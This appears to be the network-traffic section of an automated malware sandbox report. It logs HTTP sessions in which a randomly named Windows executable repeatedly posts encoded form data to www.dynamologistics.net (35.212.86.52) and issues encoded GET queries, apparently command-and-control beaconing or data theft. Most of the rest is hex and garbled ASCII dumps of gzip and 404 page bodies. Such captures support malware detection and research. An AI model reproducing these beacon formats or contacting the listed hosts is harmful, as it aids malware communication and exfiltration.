                                    Jul 11, 2024 15:06:49.333775997 CEST1236INData Raw: b9 e1 74 62 32 94 b8 38 fb 18 b9 16 78 8e e1 14 4c 86 13 99 0c 15 71 1a 4e c5 b8 c0 f3 0c c7 15 76 f9 4b eb ef f2 97 60 da 4b 0b f0 29 9c d7 bd 31 98 cc 26 2e 99 49 30 3b 37 71 a5 70 9e d5 3c 58 74 9a b8 e4 24 72 c9 68 e2 9a c3 b9 3e 23 97 6c 46
                                    Data Ascii: tb28xLqNvK`K)1&.I0;7qp<Xt$rh>#lFh#e_"3M`d"e%#UfviMTtP%(xK<r@f"Jo1%&YG0%3tCqZ*eZyR8KtrO.-<{1\d `K\N#]pd[&S8LtpdbKL)&


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.64973835.212.86.52806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:51.421675920 CEST1896OUTPOST /s992/ HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Accept-Encoding: gzip, deflate
                                    Host: www.dynamologistics.net
                                    Content-Length: 1243
                                    Content-Type: application/x-www-form-urlencoded
                                    Connection: close
                                    Cache-Control: max-age=0
                                    Origin: http://www.dynamologistics.net
                                    Referer: http://www.dynamologistics.net/s992/
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Data Raw: 62 42 3d 57 4e 2b 5a 7a 38 69 67 6e 34 43 6f 58 67 31 75 43 79 66 67 46 53 4c 54 39 6e 6f 52 36 4d 6d 51 58 51 77 57 4a 65 61 41 73 63 50 77 55 59 42 45 76 6e 68 69 51 50 4f 6d 52 6e 75 47 4e 74 30 6f 35 30 5a 63 54 63 36 31 38 6e 4d 35 45 50 35 79 70 59 65 57 68 70 79 45 70 6b 46 42 53 77 6b 63 4b 53 6a 64 6f 64 78 50 43 30 58 38 41 37 6d 75 6e 59 36 63 65 6a 4c 77 45 71 5a 32 6b 39 41 54 4d 53 71 68 52 53 6e 63 75 6f 42 38 64 47 35 58 58 67 42 51 47 2f 6d 48 63 45 78 62 70 41 71 77 79 4c 32 33 6a 56 31 61 69 71 79 36 62 54 52 32 56 75 72 59 6a 58 69 4f 67 38 5a 6b 69 4f 6b 44 30 76 35 39 4d 5a 70 48 48 78 4c 6d 79 4a 6f 43 69 54 4b 77 56 51 6d 75 65 61 38 47 63 4a 42 76 31 77 31 46 78 63 6e 74 76 4f 46 4b 33 74 4a 33 43 67 53 6f 4d 59 35 57 51 4a 36 56 6a 78 45 59 2b 5a 6c 79 6c 55 4f 6b 49 53 6f 4b 37 5a 71 78 53 78 43 36 33 49 4c 49 6f 45 6b 32 47 31 7a 6e 63 51 6e 55 52 45 2f 72 32 69 56 53 2b 43 4f 37 6e 4a 42 74 78 53 4b 77 6f 37 52 66 56 62 46 76 68 7a 52 65 46 72 77 54 37 65 71 34 4c 75 68 [TRUNCATED]
                                    Data Ascii: bB=WN+Zz8ign4CoXg1uCyfgFSLT9noR6MmQXQwWJeaAscPwUYBEvnhiQPOmRnuGNt0o50ZcTc618nM5EP5ypYeWhpyEpkFBSwkcKSjdodxPC0X8A7munY6cejLwEqZ2k9ATMSqhRSncuoB8dG5XXgBQG/mHcExbpAqwyL23jV1aiqy6bTR2VurYjXiOg8ZkiOkD0v59MZpHHxLmyJoCiTKwVQmuea8GcJBv1w1FxcntvOFK3tJ3CgSoMY5WQJ6VjxEY+ZlylUOkISoK7ZqxSxC63ILIoEk2G1zncQnURE/r2iVS+CO7nJBtxSKwo7RfVbFvhzReFrwT7eq4LuhAvkDkGhfHGeN8zP5bdqLl0woE3GvW3FYf2zPj28CtcWdSdBOGy/jkD57OuWXexPkbXDVdhlWClQQ45B30rUGyCYphi3uIRs8fUfcpCaVCiiEZaQBzWvnuO+qMmyzNk4GZfnTlLbPKJl7UcNG3oitWVD60nUnnbjSZwbdV4K/H5sI157ZjHmuRQDs1b3SR5WWvncwqu7RqsvPnlOfT8fmVqwCnLf9pg2i01tDewryMOKVllWHIewdqhfjjyHKrAWrgnzpdBu9njzqmL2ksItNd2LQWjge+ihjrz5fD86jrUG500n3jti6lkH12plj5HPO0JXEy08ZIFlvZQE6vwu3rA3lrivkTUqS1nl+Nz+QcofJLl4RuufJqaCIIdoJ5mXiN2IotkrK4SudYF2/yR/6HXiwZZG5JsOcrLBzJqhtSO0ojWXatbExLW8XqQxbzo9i8If+ZyXSSqsHAQ6/lFzQ4mDmAg4YGyOXj+hTGv0UCjnAnxGOURZKls5ZI3QjsoZqdMBtlURl3Gp1VBtTyqgpCiCHt6LKX551rGaSLuRP/lzrPpNCJ7tMhXZV2i8W9TsWaRlxdYqKe2Iqse2CRnQQqK6vOhQBpPsy66BJJag/eQ1JDoRKvsXkUnid91erOTTseaj0rGAdbkEI0T4TIG6ARVLFN8Wpqt+izT [TRUNCATED]
                                    Jul 11, 2024 15:06:52.573354006 CEST1236INHTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Thu, 11 Jul 2024 13:06:51 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Httpd-Modphp: 1
                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                    X-Proxy-Cache-Info: DT:1
                                    Content-Encoding: gzip
                                    Data Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e [TRUNCATED]
                                    Data Ascii: 4b9e}[s8{n#y@-~q=-R&)>7?|*;fi,|2Pzo?q8xxno)xxx{p^?>|:lyom/o/W7{?No_6yw8Kw{w}e<x)fO=Sn^X_zz~p<?>n?z|OoOwXwEo^_\O7x?9[exa7zxP5a%w$n^:kB^8<YF8;YM(0tr#9<?}>#H$<vDKT=fyW`|}Z]=xzDbP?)C F*y X*y+Pj6XoI\}@+^=Bm!> >l&|5@1c|n?||BhG?[{-4yYZKJZOldrlOTXUul6>Y=??M5t}=\11
                                    Jul 11, 2024 15:06:52.573369026 CEST1236INData Raw: 34 e3 10 ca cd fe d3 01 79 31 2f 3d ae 1e bf 7c 98 64 e8 fa f6 f1 d3 71 ff 2b da de e3 fd d5 5f 5c c8 4c 8d 1c a2 e9 bc 7a da dc ec 8f ef 37 d7 f7 4f 9b cd d5 ed c3 d5 71 da 74 fd 75 13 ba 9c 79 b3 19 9b b3 97 ce b1 dc 1d 3e 8e 9e 79 f1 34 eb 22
                                    Data Ascii: 4y1/=|dq+_\Lz7Oqtuy>y4"zz9o|@ss{59r3`'9;_=^= M>'tduwwl'*k%a7y7rr}eu{=_zqTpC9c=C?L
                                    Jul 11, 2024 15:06:52.573378086 CEST1236INData Raw: 49 2e ec 54 0a 74 09 38 a4 a9 f6 68 7b ba 1e bf db cf 50 a8 a6 b6 1e 4d 4e dd e3 a4 bb 6d 07 bf 21 17 68 23 63 11 43 a0 a8 26 14 63 55 41 0e 66 5a e8 27 ca 61 f3 82 1c fc b8 93 45 80 6e b0 eb 6b 84 83 0f e0 22 54 1c fa 59 d4 e1 7e 3b f4 68 ae 7a
                                    Data Ascii: I.Tt8h{PMNm!h#cC&cUAfZ'aEnk"TY~;hzk;kn*VFHlcG\~^~8dQAceE!Vdg,<@>b<6_%~]8U@;8AhoYufn<TP:+r51.5
                                    Jul 11, 2024 15:06:52.573385954 CEST1236INData Raw: 2b ec b9 28 91 36 fc f5 2d 3e 31 9f e4 3f 2d 13 98 50 52 8a d3 85 65 13 09 0d 2e b6 6d ea a0 7f a1 14 ec 3c d0 82 a2 23 a9 86 c9 99 a0 ea 50 50 38 95 f6 cc 70 1c 1d 87 0d db 07 cc 12 4c c7 f2 93 f4 1d 8a a2 ea d1 be a2 01 30 d9 98 d5 5a c9 66 87
                                    Data Ascii: +(6->1?-PRe.m<#PP8pL0Zf<VJa_q(L3&-R"v,X=]Y<`!2B.Y0;9pv2RPsP$\0y~Ao[}UG\U&~ul&@NLhxQiv[9}6 @<
                                    Jul 11, 2024 15:06:52.573390961 CEST1236INData Raw: 4f 16 96 16 ad 2c ab 9a 81 25 12 67 4d 30 b6 2f d3 84 67 45 81 2b 97 5d 8b 6a 96 28 6c ed d3 1a 29 a9 42 b8 54 81 b9 60 74 8d 4b 3c 53 16 0a 27 59 88 4e 15 2f 5c ba 10 5d 8a 67 0a 43 e1 24 0c d1 a9 ea 85 4b 19 a2 4b f1 4c 69 30 9c a4 41 36 55 bf
                                    Data Ascii: O,%gM0/gE+]j(l)BT`tK<S'YN/\]gC$KKLi0A6UPj\)'D=Hym2Aa<z,du<D.y.3pT%x<N W$2F)%`<gT.1/<6%[Rmx!.Uq!IR++
                                    Jul 11, 2024 15:06:52.573399067 CEST1236INData Raw: a8 70 9d ca 0c c3 7e 49 7c 58 fd a5 3b 14 b8 2a 26 4d fb aa 18 55 2b 8c 92 f6 a5 b8 04 cb 53 34 23 49 d1 ce 22 c9 12 94 a0 9d 26 01 33 f5 cc 50 d2 b3 f3 48 b0 ca 04 9b 70 e7 49 c0 4c 35 33 94 d4 ec 3c 92 ab 40 36 e0 ce 93 82 79 5a 66 28 69 d9 79
                                    Data Ascii: p~I|X;*&MU+S4#I"&3PHpIL53<@6yZf(iyV|;M)dVEv1#A<*y3^'s1RHs1/tP1yU24S%%IjU>(e2%hKZ&*b&Sf2IB]$J<=3L"V MS4CA:-u*3(McTn@
                                    Jul 11, 2024 15:06:52.573405027 CEST776INData Raw: 34 14 4d d2 20 99 6a 5e b0 94 41 b2 14 7e 41 18 b1 df 0d 51 b1 13 8d dd d6 16 66 b4 6c 3f 2d cc 68 61 58 bd 2b ad 63 c5 e6 3b b6 03 5a 98 c9 aa 30 20 c7 3c 56 8f 1d 27 31 ad 65 3b 2a 55 ad ed 74 1b ea 60 6d aa 5a ce 6a 45 a6 01 b7 18 d8 16 31 d8
                                    Data Ascii: 4M j^A~AQfl?-haX+c;Z0 <V'1e;*Ut`mZjE1~ndliLa0\HbS {D|W)6^bw1j.h6`edi}0M{c4@@o${AQ*HQ2kcmPJN#F
                                    Jul 11, 2024 15:06:52.573412895 CEST1236INData Raw: 60 2c 8a 80 44 ac 68 61 2e 02 d2 24 58 96 08 18 88 f5 4e 12 af 77 41 5e ef e4 98 43 59 4d 01 76 6b 1b 6c ef 0e aa 00 d3 4b 45 3b 76 01 42 a9 02 5c ad e1 02 33 6a 44 68 9e 0a 74 34 55 20 26 d6 b3 50 aa 40 4c 09 9a a7 02 c5 a2 0a c4 c4 7a 16 4a 15
                                    Data Ascii: `,Dha.$XNwA^CYMvklKE;vB\3jDht4U &P@LzJ)ATXTX\I,0U@jAr, n*0*}PcT@1RbJ<(U &P@LH* Me $m=K/q.%1MuC@M^AWB4
                                    Jul 11, 2024 15:06:52.573424101 CEST1236INData Raw: 39 86 55 36 3f 4b 01 d9 98 0b d3 b3 c8 35 86 48 82 5c 40 61 be 2f 85 b2 04 c4 38 14 10 29 28 12 62 14 10 39 e6 58 9e 80 18 88 02 22 09 45 a2 0c b8 80 48 32 c7 f2 04 c4 40 14 10 49 28 12 61 2e 20 92 24 58 96 80 18 88 02 22 09 55 22 2c 08 88 1c 09
                                    Data Ascii: 9U6?K5H\@a/8)(b9X"EH2@I(a. $X"U",qx9p8]CSO*pas(KWC]9C"QVAUE9*"Ge(*pM"48SnH1$GjJ.4YR(*K<PKD'/
                                    Jul 11, 2024 15:06:52.573745012 CEST1236INData Raw: 37 2b d9 5b 1e a3 8e 04 53 26 f3 d4 67 65 c2 d4 52 89 52 4b 05 82 29 12 71 a7 70 9e 46 18 4c 12 11 97 24 40 58 0a 11 57 02 67 0a 84 c1 a4 0f 71 a9 fe 95 15 8e 6b c5 95 c0 99 ea 60 30 89 43 5c ac 7d a1 d4 86 a8 12 34 4b 1a da 95 50 75 af 7d 09 d5
                                    Data Ascii: 7+[S&geRRK)qpFL$@XWgqk`0C\}4KPu}hc%HGOuwyDtT@HyHGDmHK<pIs!$pPajgz8L6[5#De5p9fD5p9j"[vT
                                    Jul 11, 2024 15:06:52.573755980 CEST1236INData Raw: 27 c3 89 2e c1 73 0d 27 3a 19 8e 74 d1 50 c2 65 38 d2 2d f0 4c c3 29 1c 24 11 0c 27 3a 39 4a 38 0d 27 b6 14 f6 e4 67 0d a7 68 32 9c d8 e8 a8 08 d3 70 62 4b e1 3c c3 29 9a 1b 4e 54 32 54 44 69 38 71 2d f0 1c c3 29 98 0c 27 32 19 2a e2 34 9c c8 16
                                    Data Ascii: '.s':tPe8-L)$':9J8'gh2pbK<)NT2TDi8q-)'2*4xr%e'tR8l&iM^L+%#K>2rE)+:!Wgzd1qC*A3Xh 4]#QX,19i,1pRWiwktt"
                                    Jul 11, 2024 15:06:52.573765039 CEST1236INHTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Thu, 11 Jul 2024 13:06:51 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Httpd-Modphp: 1
                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                    X-Proxy-Cache-Info: DT:1
                                    Content-Encoding: gzip
                                    Data Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e [TRUNCATED]
                                    Data Ascii: 4b9e}[s8{n#y@-~q=-R&)>7?|*;fi,|2Pzo?q8xxno)xxx{p^?>|:lyom/o/W7{?No_6yw8Kw{w}e<x)fO=Sn^X_zz~p<?>n?z|OoOwXwEo^_\O7x?9[exa7zxP5a%w$n^:kB^8<YF8;YM(0tr#9<?}>#H$<vDKT=fyW`|}Z]=xzDbP?)C F*y X*y+Pj6XoI\}@+^=Bm!> >l&|5@1c|n?||BhG?[{-4yYZKJZOldrlOTXUul6>Y=??M5t}=\11
                                    Jul 11, 2024 15:06:52.573781967 CEST1236INHTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Thu, 11 Jul 2024 13:06:51 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Httpd-Modphp: 1
                                    Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                    X-Proxy-Cache-Info: DT:1
                                    Content-Encoding: gzip
                                    Data Raw: 34 62 39 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 5b 73 1c b7 9a e4 fb f9 15 bd 9c d8 38 7b e9 6e d5 ad eb a2 23 79 d7 e3 99 89 f3 40 cf ec 2d bc b1 7e 71 b4 c8 96 c8 3d 2d 52 26 29 c9 3e 13 f3 df 37 3f 7c 99 a8 2a 14 d9 0d 3b 66 f7 69 ed 10 9b ec 2c 7c 89 02 32 01 14 50 85 7a f3 6f fe ee 9f be fb 1f ff eb bf fc fd ea e6 e9 e3 f1 9b 3f bc b1 8f d5 71 7f f7 e1 ed c5 e1 ee c2 be 38 ec af bf f9 c3 0a ff bd f9 78 78 da af ae 6e f6 0f 8f 87 a7 b7 17 9f 9f de 6f fa 8b d5 ab 29 78 b7 ff 78 78 7b f1 e5 f6 f0 f5 d3 fd c3 d3 c5 ea ea fe ee e9 70 87 83 bf de 5e 3f dd bc bd 3e 7c b9 bd 3a 6c c2 1f eb d5 ed dd ed d3 ed fe b8 79 bc da 1f 0f 6f cb 6d 01 ba 91 e7 e6 e9 e9 d3 e6 f0 f3 e7 db 2f 6f 2f ae f6 57 37 87 8d 05 7b b8 3f 4e a2 de dd 6f 1e 9f ee 1f 0e eb 8f fb 5f 36 fb 0f 87 b7 c5 b3 f9 79 b8 7f 77 ff f4 38 4b 77 7b 77 7d f8 65 3c f8 e9 f6 e9 78 f8 a6 29 9a d5 66 f5 8f f7 4f ab f7 f7 9f ef ae df bc f2 af 3d 53 c7 db bb bf ac 6e 1e 0e ef df 5e 58 d6 1e 5f bf 7a f5 1e 19 7a dc 7e b8 bf ff 70 3c ec 3f dd 3e [TRUNCATED]
                                    Data Ascii: 4b9e}[s8{n#y@-~q=-R&)>7?|*;fi,|2Pzo?q8xxno)xxx{p^?>|:lyom/o/W7{?No_6yw8Kw{w}e<x)fO=Sn^X_zz~p<?>n?z|OoOwXwEo^_\O7x?9[exa7zxP5a%w$n^:kB^8<YF8;YM(0tr#9<?}>#H$<vDKT=fyW`|}Z]=xzDbP?)C F*y X*y+Pj6XoI\}@+^=Bm!> >l&|5@1c|n?||BhG?[{-4yYZKJZOldrlOTXUul6>Y=??M5t}=\11


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.64973935.212.86.52806784C:\Program Files (x86)\INuPKOBHtxRtCsydJHcFtsIFNsRNRRXyZfxtYCnifJKwmUP\BSPmWtBGjJwku.exe
                                    TimestampBytes transferredDirectionData
                                    Jul 11, 2024 15:06:53.999547958 CEST586OUTGET /s992/?bB=bPW5wL+6+Zn0FmJaaGSlZRyF0EkywNPIdxoHB7misPGpWoJmvT99WPeeVFPeE+QW7lFzZIe3p3wvC9c3tru/pp3mulo7axc+TzXdoadqFnX1TrnWwrCFMVfzI6hQm88OLivvE0I=&GX=iP9xCL HTTP/1.1
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Accept-Language: en-US,en;q=0.5
                                    Host: www.dynamologistics.net
                                    Connection: close
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Jul 11, 2024 15:06:54.462795019 CEST1236INHTTP/1.1 404 Not Found
                                    Server: nginx
                                    Date: Thu, 11 Jul 2024 13:06:54 GMT
                                    Content-Type: text/html
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    X-Httpd-Modphp: 1
                                    Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                    X-Proxy-Cache: MISS
                                    X-Proxy-Cache-Info: 0 NC:000000 UP:
                                    Data Raw: 31 33 64 34 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 [TRUNCATED]
                                    Data Ascii: 13d4b<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex" /> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { positi
                                    Jul 11, 2024 15:06:54.462940931 CEST1236INData Raw: 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20
                                    Data Ascii: on: relative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20px auto 10px; }
                                    Jul 11, 2024 15:06:54.462951899 CEST1236INData Raw: 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72
                                    Data Ascii: margin: 0 auto; } @media screen and (max-width: 767px) { .error--bg__cover { display: none; } .abstract-half-dot--circle { left: 0; } }</style></head><body> <div id="container"> <section class="err
                                    Jul 11, 2024 15:06:54.462960005 CEST1236INData Raw: 36 37 71 2d 2e 31 33 2c 30 2d 2e 32 36 31 2c 30 61 39 2e 39 33 33 2c 39 2e 39 33 33 2c 30 2c 30 2c 31 2d 36 2e 39 39 34 2d 33 2e 31 30 38 68 30 61 31 30 2c 31 30 2c 30 2c 31 2c 31 2c 37 2e 32 35 35 2c 33 2e 31 31 5a 6d 2d 2e 30 31 33 2d 31 38 61
                                    Data Ascii: 67q-.13,0-.261,0a9.933,9.933,0,0,1-6.994-3.108h0a10,10,0,1,1,7.255,3.11Zm-.013-18a8,8,0,0,0-5.793,13.511h0a8,8,0,1,0,6-13.509C750.134,449,750.063,449,749.994,449Z" fill="#226d7a"/><path d="M292.416,254.312a1.013,1.013,0,0,1-.417-.09L266.634,24
                                    Jul 11, 2024 15:06:54.462970972 CEST1236INData Raw: 35 35 35 2c 31 2e 39 32 32 5a 4d 31 30 37 2c 32 32 38 61 35 2c 35 2c 30 2c 31 2c 31 2d 35 2c 35 41 35 2e 30 30 36 2c 35 2e 30 30 36 2c 30 2c 30 2c 31 2c 31 30 37 2c 32 32 38 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68
                                    Data Ascii: 555,1.922ZM107,228a5,5,0,1,1-5,5A5.006,5.006,0,0,1,107,228Z" fill="#226d7a"/><path d="M74.783,225.467l8.647,2.5a.989.989,0,0,0,.278.04,1,1,0,0,0,.276-1.962l-8.646-2.5a1,1,0,0,0-.555,1.922Z" fill="#226d7a"/><path d="M28.617,241.8a1,1,0,0,0,.7-.
                                    Jul 11, 2024 15:06:54.462980986 CEST1236INData Raw: 31 2c 31 2c 30 2c 30 2c 30 2d 2e 35 35 34 2c 31 2e 39 32 32 6c 38 2e 36 34 36 2c 32 2e 35 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 32 31 36 2e 30 33 31 2c 37 2c 37 2c 30 2c 31 2c 30 2c 31 31 2e 39 38 2d 33 2e 32 6c 36 2e 30 30 36 2d 35 2e 38 32 35 61
                                    Data Ascii: 1,1,0,0,0-.554,1.922l8.646,2.5a1,1,0,0,0,.216.031,7,7,0,1,0,11.98-3.2l6.006-5.825a1,1,0,1,0-1.392-1.435ZM81,334a5,5,0,1,1,5-5A5.006,5.006,0,0,1,81,334Z" fill="#226d7a"/><path d="M103.687,304.486l-6.461,6.266a1,1,0,0,0,1.393,1.436l6.461-6.266a1
                                    Jul 11, 2024 15:06:54.463066101 CEST1236INData Raw: 4d 38 38 36 2e 39 38 33 2c 31 36 32 2e 37 37 33 61 31 2c 31 2c 30 2c 30 2c 30 2c 2e 39 35 31 2d 31 2e 33 31 31 6c 2d 32 2e 38 2d 38 2e 35 35 35 61 31 2c 31 2c 30 2c 30 2c 30 2d 31 2e 39 2e 36 32 31 6c 32 2e 38 2c 38 2e 35 35 35 41 31 2c 31 2c 30
                                    Data Ascii: M886.983,162.773a1,1,0,0,0,.951-1.311l-2.8-8.555a1,1,0,0,0-1.9.621l2.8,8.555A1,1,0,0,0,886.983,162.773Z" fill="#226d7a"/><path d="M879.544,135.8a1,1,0,1,0-1.9.621l2.795,8.555a1,1,0,0,0,.951.69,1,1,0,0,0,.95-1.311Z" fill="#226d7a"/><path d="M90
                                    Jul 11, 2024 15:06:54.463076115 CEST1236INData Raw: 32 61 31 2c 31 2c 30 2c 31 2c 30 2c 31 2e 36 2d 31 2e 32 5a 22 20 66 69 6c 6c 3d 22 23 32 32 36 64 37 61 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 36 32 2e 36 2c 32 34 30 2e 38 41 31 2c 31 2c 30 2c 30 2c 30 2c 39 36 31 2c 32 34 32 6c 35 2e 34 2c
                                    Data Ascii: 2a1,1,0,1,0,1.6-1.2Z" fill="#226d7a"/><path d="M962.6,240.8A1,1,0,0,0,961,242l5.4,7.2A1,1,0,0,0,968,248Z" fill="#226d7a"/><path d="M931.091,198.789a6.943,6.943,0,0,0,1.777-6.129l7.473-4.185a1,1,0,1,0-.977-1.745l-7.172,4.016a6.988,6.988,0,0,0-1
                                    Jul 11, 2024 15:06:54.463084936 CEST1224INData Raw: 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 39 38 32 2c 32 36 31 61 36 2e 39 34 31 2c 36 2e 39 34 31 2c 30 2c 30 2c 30 2d 33 2e 35 32 37 2e 39 36 34 4c 39 37 33 2e 34 2c 32 35 35 2e 32 61 31 2c 31 2c 30 2c 31 2c 30 2d 31 2e 36 2c 31 2e 32 6c 35 2e 31 30
